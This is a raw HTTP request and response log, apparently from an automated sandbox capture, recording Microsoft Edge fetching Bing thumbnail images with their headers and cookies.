cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1828
cache-control: public, max-age=2144306
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c82
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=OSK.f26bf61d4e3becf4df6936414f0865ab&w=80&h=80&c=7&o=6&pid=SANGAMmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OSK.f26bf61d4e3becf4df6936414f0865ab&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1668
cache-control: public, max-age=1813858
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MEM_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c83
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=OSK.e916af50a9b5938ce7a6c9a7a2e08c7b&w=80&h=80&c=7&o=6&pid=SANGAMmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OSK.e916af50a9b5938ce7a6c9a7a2e08c7b&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1458
cache-control: public, max-age=1183303
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_MEM_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c84
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=OSK.a55d2147e4ec2a0fa38a3889b62b2ebc&w=80&h=80&c=7&o=6&pid=SANGAMmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OSK.a55d2147e4ec2a0fa38a3889b62b2ebc&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2010
cache-control: public, max-age=608977
date: Thu, 29 Feb 2024 15:31:49 GMT
x-cache: TCP_HIT from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220709.26a4c85
x-check-cacheable: YES
-
GEThttps://th.bing.com/th?id=OVP.lm0KeWTIbgyhTNxvz885MAHgFo&w=608&h=342&c=7&rs=1&qlt=90&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OVP.lm0KeWTIbgyhTNxvz885MAHgFo&w=608&h=342&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 39868
x-check-cacheable: YES
cache-control: public, max-age=205783
date: Thu, 29 Feb 2024 15:31:50 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220710.26a5744
-
GEThttps://th.bing.com/th?id=OVP.pCT8UivH9jg8Re51sSFbeAHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OVP.pCT8UivH9jg8Re51sSFbeAHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 15905
x-check-cacheable: YES
cache-control: public, max-age=1723934
date: Thu, 29 Feb 2024 15:31:50 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220710.26a574b
-
GEThttps://th.bing.com/th?id=OVP.OoHjttYXXGZAiQ_NMG-akgEsDh&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OVP.OoHjttYXXGZAiQ_NMG-akgEsDh&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2476
x-check-cacheable: YES
cache-control: public, max-age=858176
date: Thu, 29 Feb 2024 15:31:50 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220710.26a574c
-
GEThttps://th.bing.com/th?id=OVP.J3_WECcOQmcITdW70uwPCAEsDh&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7msedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OVP.J3_WECcOQmcITdW70uwPCAEsDh&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 8958
x-check-cacheable: YES
cache-control: public, max-age=71819
date: Thu, 29 Feb 2024 15:31:50 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220710.26a574a
-
GEThttps://th.bing.com/th?id=OSK.HEROO9QW1akP0oES5Qqz7E9b5CmeL_aBb1vIneZrxOMEG7I&w=472&h=280&c=1&rs=2&o=6&pid=SANGAMmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OSK.HEROO9QW1akP0oES5Qqz7E9b5CmeL_aBb1vIneZrxOMEG7I&w=472&h=280&c=1&rs=2&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7661
x-check-cacheable: YES
cache-control: public, max-age=956870
date: Thu, 29 Feb 2024 15:31:50 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220710.26a5748
-
GEThttps://th.bing.com/th?id=OSK.HIKUUFKV3JJCxBBCAady78TVfmIYl7pzBYceieaNmwIDIgk&w=90&h=90&c=7&o=6&pid=SANGAMmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OSK.HIKUUFKV3JJCxBBCAady78TVfmIYl7pzBYceieaNmwIDIgk&w=90&h=90&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 2420
x-check-cacheable: YES
cache-control: public, max-age=512327
date: Thu, 29 Feb 2024 15:31:50 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220710.26a574e
-
GEThttps://th.bing.com/th?id=OSK.31bb8bd828eb9d00ed396b13dc134c00&w=188&h=144&o=6&pid=SANGAMmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OSK.31bb8bd828eb9d00ed396b13dc134c00&w=188&h=144&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229&T=1709220708000
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-02-29T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0001-01-01T00:00:00.0000000&rwflt=0001-01-01T00:00:00.0000000&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-02-29T15:31:49.9036728+00:00&rwred=0&wls=&wlb=&wle=&ccp=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803&R=3&RB=0&GB=0&RG=200&RP=0
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0&CIBV=1.1600.1&EXLTT=1
ResponseHTTP/2.0 200
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 8135
x-check-cacheable: YES
cache-control: public, max-age=624809
date: Thu, 29 Feb 2024 15:31:50 GMT
x-cache: TCP_MISS from a92-123-119-169.deploy.akamaitechnologies.com (AkamaiGHost/11.4.2.2-54697487) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.a9777b5c.1709220710.26a5749
-
GEThttps://th.bing.com/th?id=OSK.HEROO9QW1akP0oES5Qqz7E9b5CmeL_aBb1vIneZrxOMEG7I&w=384&h=228&c=1&rs=2&o=6&pid=SANGAMmsedge.exeRemote address:92.123.128.169:443RequestGET /th?id=OSK.HEROO9QW1akP0oES5Qqz7E9b5CmeL_aBb1vIneZrxOMEG7I&w=384&h=228&c=1&rs=2&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
